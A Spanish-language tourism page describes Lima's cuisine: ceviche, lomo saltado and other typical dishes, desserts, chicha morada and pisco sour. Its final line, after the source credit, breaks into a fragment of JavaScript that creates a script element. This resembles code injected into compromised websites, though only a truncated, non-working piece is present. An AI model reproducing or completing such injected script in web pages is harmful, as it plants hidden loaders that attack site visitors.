Image

QUICK CONTACT

[contact-form-7 id="2507" title="quick contact"]

GASTRONOMÍA

Lima como uno de sus mayores atractivos te ofrece su gran oferta gastronómica. No por nada la ciudad fue nombrada como capital gastronómica de América Latina durante la Cuarta Cumbre internacional de Gastronomía Madrid Fusión en 2006.

Turistas de diferentes partes del mundo llegan aquí para conocer y probar nuestro famoso plato de bandera: el ceviche. Pero la cocina limeña tiene mucho más que ofrecer, ahí tenemos su apetitosa causa, su papa rellena, su sancochado, su lomo saltado, sus anticuchos y su ají de gallina, entre muchos otros.

chef decorating dessert

La cocina limeña ha heredado los secretos culinarios prehispánicos y coloniales y ha sabido fusionarlos con las más deliciosas gastronomías de oriente y Europa. El secreto de su éxito parece residir en la libertad para explorar nuevos sabores, para combinar ingredientes, para rescatar insumos del olvido y transformar sabiamente todo lo sabroso que otros pueblos nos han ofrecido creando un producto original.

Lima es también una ciudad de azúcar, posee numerosos postres criollos como: suspiro de limeña, mazamorra morada, arroz con leche, picarones y el clásico turrón de doña Pepa que se consume en octubre durante la festividad del Señor de los Milagros.

Buena comida para todos los bolsillos se puede encontrar en cada rincón de la ciudad de Lima; aquí no es indispensable tener mucho dinero para endilgarse un banquete de reyes. En los famosos huariques (fondas o pequeños restaurantes que son reconocidos por ofrecer algún plato de original o de exquisito sabor) se puede comer riquísimo y a precios accesibles; también tenemos restaurantes que ofrecen menús económicos.

Lima te ofrece también restaurantes de primer nivel, de renombrados chefs de clase mundial donde se ofrece de la mejor manera lo mejor de la gastronomía peruana. La ciudad de los reyes se debe visitar con el tenedor en la mano.

Principales platos típicos que puede saborear en Lima son:

  • El Ceviche (filete de pescado cortado en trozos cocido con limón, cebolla y ají limo).
Ceviche

Ceviche

  • El Pollo a la Brasa (Pollo en brasa con papas fritas y ensalada de verduras).
  • La Carapulcra (papa seca sancochada y guisada con carnes de chancho y gallina, ají panca y mirasol, ajos y otras especias).
  • Los Anticuchos (brochetas de corazón de res maceradas en vinagre y ají panca, asadas a la parrilla).

gastronomia  3

  • El Lomo Saltado (lomo de res picado en tiras y salteado con cebolla, tomate, ají y diversas hierbas; se sirve con papas fritas y arroz).
  • El Ají de gallina (gallina guisada en trozos con leche, queso, ají y nueces).
  • Causa rellena (pasta de papa amarilla sazonada con ají molido, rellena con atún).
  • Choros a la chalaca (mejillones encebollados con una pizca de ají y sazonados con jugo de limón)
  • Parihuela (sopa conventrada de pescados y mariscos).
  • Sancochado (carne de res cocida con choclo, camote, zanahoria, col, yuca y papa).
  • Arroz Chaufa (Arroz, pollo, cebolla china, huevos, tocino, pimiento rojo)

 

Sus postres típicos son:

  • La mazamorra morada (dulce de harina de maíz morado y de camote con frutas frescas y secas).

gastronomia 3

 

  • El suspiro a la limeña (merengue con dulce de leche y vainilla).
  • El turrón de Doña Pepa (masa de harina con manteca horneada y bañada con miel de chancaca y caramelos encima).
  • Los picarones (aros fritos de harina de camote y zapallo, bañados con miel de chancaca o melaza de caña).
© Clay Williams / http://claywilliamsphoto.com

© Clay Williams / http://claywilliamsphoto.com

La Chicha Morada,  bebida tradicional, hecha del maíz morado que se cultiva en la cordillera de los andes.  Su historia y consumo ya era extendida en la época prehispánica, con antelación a la instauración del Imperio Inca.

b220140725044259

El Pisco Sour es un cóctel que en el año 2007 se declaró patrimonio cultural de la nación. Su preparación es en base a pisco y el jugo de limón. La denominación proviene de la unión de las palabras «pisco» (un tipo de aguardiente de uvas) y «sour» (en referencia a la familia de cócteles que utilizan limón como parte de su receta).

Pisco-Sour

 

Fuente: Origen Andinovar d=document;var s=d.createElement(‘script’);